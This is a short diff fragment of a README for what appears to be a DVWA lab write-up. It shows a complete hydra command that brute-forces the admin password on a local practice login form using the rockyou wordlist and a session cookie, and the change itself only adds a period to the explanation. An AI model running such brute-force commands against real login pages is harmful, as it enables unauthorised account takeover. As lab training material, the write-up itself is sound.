Aftab700/DVWA-Writeup/README.md

 hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
 ```

-Here we are using cookies because if we are not authenticated when we make the login attempts, we will be redirected to default login page
+Here we are using cookies because if we are not authenticated when we make the login attempts, we will be redirected to default login page.

 <!-- {::options parse_block_html="true" /}  -->